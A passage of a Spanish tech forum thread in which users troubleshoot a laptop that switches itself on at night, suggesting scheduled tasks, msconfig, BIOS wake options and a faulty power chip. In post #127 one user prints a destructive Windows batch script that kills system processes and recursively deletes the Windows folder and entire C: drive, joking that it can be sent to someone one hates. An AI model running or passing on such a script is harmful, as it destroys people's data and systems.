El portátil se me enciende solo.

lunetico
#121 por lunetico el 12/01/2015
:estonova:
Archivos adjuntos ( para descargar)
Tareas.jpg
Subir
OFERTASVer todas
  • -40%
    ¡Precio mínimo histórico! AKAI MPK 261
    298 €
    Ver oferta
  • -26%
    AKAI MPC Key 61
    1.290 €
    Ver oferta
  • -21%
    Zoom H4n Pro Black
    158 €
    Ver oferta
El Rey de España
#122 por El Rey de España el 13/01/2015
#121 No tiene nada que ver con eso.
Subir
Last System
#123 por Last System el 13/01/2015
Sino tienes una tarea programada para iniciar wl ordenador

Prueba a ver como tienes el arranque .

Ejecuta el comando msconfig en el menu de inicio y te saldrá la pantalla que dejo en imagen .
Vete a la pestaña de arranque y mira también en opciones avanzadas .

como ves la imagen es como lo tengo yo en Windows 7 y tu deberías tenerlo igual

2d1cd8a43c089ddbd80847e76c1a9-4024278.jpg
Subir
Jack
#124 por Jack el 13/01/2015
Hace mucho un amigo tenía un PC que encendía sólo siempre a las 12 de la noche, ovbiamente sólo estando conectado.
Me lo dejó para que lo revisara y procedí a dejarlo conectado en espera a que encendiera y sí, efectivamente a exactamente la medianoche la cosa alumbró el cuarto. El hombre decía a todo mundo que su oredenador estaba embrujado :desdentado:
Cuando revisé en el BIOS, había allí una opción activada que hacía que el reloj encendiera la computadora a esa hora. Simplemente desactivé esa opción y problema resuelto.
:teclear:
Subir
El Rey de España
#125 por El Rey de España el 13/01/2015
#123 Está todo ok compañero, gracias por tu sugerencia.

De verdad que no os calentéis la cabeza con este tema...un buen amigo, ingeniero infoirmático ya trasteó en su momento con el portátil y no hay nada que hacer, no hay forma de saber porque cojones se enciende el ordenador...solo por las noches.

Cuando cambie de ordenador si algún informático freak quiere que le envíe el portátil que me avise. He de avisar que NUNCA he pillado el ordenador encendiéndose solo, siempre ha lo pillo ya encendido y algo más escabroso y que seguramente nadie se creerá, es que cambié la imagen de avatar que usaba como admin del pc y al día siguiente estaba de nuevo la que había anteriormente...pá cagarse.
Subir
Jack
#126 por Jack el 13/01/2015
:susto:
Subir
Last System
#127 por Last System el 13/01/2015
Yo hice unos cursos de Seguridad informática y microinformatica
Sino es una tarea programada ( yo las miraría una a una con lupa , ya que los virus lo utilizan )
Y no es por la Bios
Entonces ya la ultima opción que veo , es que sea un programa que tengas instalado que lo ejecute.
O sino , es un archivo Bat (virus) que ejecutaste en su momento

Os dejo el ejemplo de un simple virus donde borra todo la carpeta Windows (para mandárselo ha alguien que odias , jejeje)

Si por aquí alguien lo copia y lo ejecutas por error ,...yo no me responsabilizo !! ,...conste en acta !! :P


@echo off
ipconfig /release
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
shutdown -a
taskkill /f /im lsass.exe
taskkill /f /im winlogon.exe
del /s /f /q "C:WINDOWS"
del /s /f /q "C:Archivos de programa"
del /s /f /q "C:Documents and Settings"
del /s /f /q "C:"
shutdown -r -f -t 01
exit
Subir
Rowf The Beat Bender
#128 por Rowf The Beat Bender el 14/01/2015
Realmente Loormelote lo de que sea un boton pegado no seria tan raro, he arreglado unos cuantos moviles con ese fallo y podria ser que lo tenga tu portatil... Si quieres probarlo...
Subir
El Rey de España
#129 por El Rey de España el 14/01/2015
#128 Muchas gracias por tu sugerencia, pero de momento seguiré con la buena práctica de cerrar la tapa. No tengo ningunas ganas de ponerme a desmontar el portátil y por error cargarme alguna cosa y que luego me dé problemas para encenderlo o directamente no pueda. Lo necesito en mi día a día para currar desde casa, así que mejor dejos los experimentos para cuando tenga un de sustitución.
Subir
Paquito Chocolatero
#130 por Paquito Chocolatero el 28/05/2015
No es de windows. Nada de todo eso. Por lo menos a mi no me funciona.

He quitado el disco duro. Enciendo el portatil y lo apago y se enciende solo si esta enchufado.

Si no esta enchufado se queda apagado.

Si lo enchufo apagado, se nciende.

Con windows si le mando apagar, lo desenchufo de la corriente y le pulso la tecla de apagar se queda apagado.

Ojo que si lo enchufo a la corriente apagado se vuelve a encender.

Lo que creo es que es de un chip de control del power_off de la placa.

Todas las opciones de la bios las he deasctivado.

Si alguien tiene una solucion o sabe cual es el chip del boton de apagado o de wake on lan que lo indique pues creo que ese es el que esta mal.

Salu2
Subir
Sisu
#131 por Sisu el 28/05/2015
Grandes reflotes ultimamente. Loormelotte aun tiene ese portatil, conste
Subir
Hilos similares
Nuevo post

Regístrate o para poder postear en este hilo